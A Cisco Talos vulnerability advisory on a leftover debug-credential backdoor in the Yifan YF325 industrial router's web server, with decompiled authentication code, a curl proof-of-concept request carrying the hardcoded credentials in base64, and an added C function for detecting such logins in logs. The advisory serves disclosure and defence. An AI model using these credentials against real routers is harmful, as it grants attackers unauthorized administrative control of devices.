CVE-2023-32645: TALOS-2023-1752 || Cisco Talos Intelligence Group
SUMMARY
A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Yifan YF325 v1.0_20221108
PRODUCT URLS
YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html
CVSSv3 SCORE
9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-489 - Leftover Debug Code
DETAILS
The Yifan YF325 is an industrial cellular router designed for M2M and IoT applications. It allows remote management and offers several VPN services among many other features.
The YF325 router exposes a series of APIs, a subset of which requires authentication before execution. When a requested API requires valid credentials, they are checked by the httpd's check_credentials function:
bool check_credentials
    (char *correct_username, char *correct_password, undefined4 param_3, char *Authorization)
{
    [...]
    provided_username._0_4_ = 0;
    memset(provided_username + 4, 0, 0x1f0);
    if (*correct_password == '\0') {
auth_ok:
        auth_ok = true;
    }
    else {
        if ((Authorization != (char *)0x0) && (idx = strncmp(Authorization, "Basic ", 6), idx == 0)) {
            [...]
            [... base64 decode Authorization value into provided_username ...]
            /* split the decoded "user:password" pair at the colon */
            provided_password = strchr((char *)provided_username, L':');
            if (provided_password != (char *)0x0) {
                *provided_password = '\0';
                /* leftover debug credentials: hardcoded username and password */
                is_equal = strcmp((char *)provided_username, "ffadmin"); [1]
                if ((is_equal == 0) && (idx = strcmp(provided_password + 1, "ffadminff"), idx == 0)) [2]
                    goto auth_ok;
                /* regular path: compare crypt() of the provided values against the stored admin credentials */
                crypt_username = crypt((char *)provided_username, correct_username);
                if ((crypt_username != (char *)0x0) &&
                    ((idx = strcmp(crypt_username, correct_username), idx == 0 &&
                     (provided_password = crypt(provided_password + 1, correct_password),
                      provided_password != (char *)0x0)))) {
                    idx = strcmp(provided_password, correct_password);
                    return idx == 0;
                }
            }
        }
        auth_ok = false;
    }
    return auth_ok;
}
This function compares the provided username and password with the correct credentials, those of the admin. However, because of leftover debug code, a special pair of debug credentials, checked at `[1]` and `[2]`, bypasses the credential check and grants admin permissions with fixed credentials.
Exploit Proof of Concept
The following is a request without credentials:
$ curl -s http://<ROUTER_IP>/Status_Router.asp | head -n 20
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
[...]
The resource is `Unauthorized`. The following is the same request, but with the debug credentials:
$ curl -s -H "Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY=" http://<ROUTER_IP>/Status_Router.asp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=iso-8859-1; X-XSS-Protection: 1;mode=block" />
[...]
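Because the debug credentials checked at `[1]` and `[2]` are fixed, an attempt to use them is visible in the HTTP Authorization header. The following function, an added example and not part of the advisory or the vendor's firmware, decodes a Basic Authorization header and reports whether it carries those credentials, so it can be dropped into a log scanner or proxy rule; the sample headers and the function names are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Decode one base64 alphabet character; -1 for anything else (incl. '=' padding). */
static int b64_val(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode base64 into a NUL-terminated buffer; returns length, or -1 on bad input/overflow. */
static int b64_decode(const char *in, char *out, size_t outsz)
{
    unsigned int acc = 0; int bits = 0; size_t n = 0;
    for (; *in != '\0' && *in != '='; in++) {
        int v = b64_val(*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v; bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n + 1 >= outsz) return -1;
            out[n++] = (char)((acc >> bits) & 0xff);
            acc &= (1u << bits) - 1;          /* keep only the leftover bits */
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* True if the header value is "Basic <b64>" decoding to the YF325 leftover debug credentials. */
bool is_yf325_debug_login(const char *authorization)
{
    char creds[256];
    if (authorization == NULL || strncmp(authorization, "Basic ", 6) != 0) return false;
    if (b64_decode(authorization + 6, creds, sizeof creds) < 0) return false;
    char *colon = strchr(creds, ':');
    if (colon == NULL) return false;
    *colon = '\0';                            /* split user:password like the firmware does */
    return strcmp(creds, "ffadmin") == 0 && strcmp(colon + 1, "ffadminff") == 0;
}

/* Constructed sample Authorization headers, as a log scanner would see them. */
static const char *SAMPLE_AUTH_HEADERS[] = {
    "Basic YWRtaW46YWRtaW4=",                 /* admin:admin, an ordinary login */
    "Basic ZmZhZG1pbjpmZmFkbWluZmY=",         /* the advisory's debug credentials */
    "Bearer not-a-basic-header",
};

/* Count how many of the constructed samples are debug-credential attempts. */
int count_debug_attempts(void)
{
    int hits = 0;
    for (size_t i = 0; i < sizeof SAMPLE_AUTH_HEADERS / sizeof *SAMPLE_AUTH_HEADERS; i++)
        hits += is_yf325_debug_login(SAMPLE_AUTH_HEADERS[i]) ? 1 : 0;
    return hits;
}
```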
TIMELINE
2023-06-28 - Initial Vendor Contact
2023-07-06 - Vendor Disclosure
2023-10-11 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.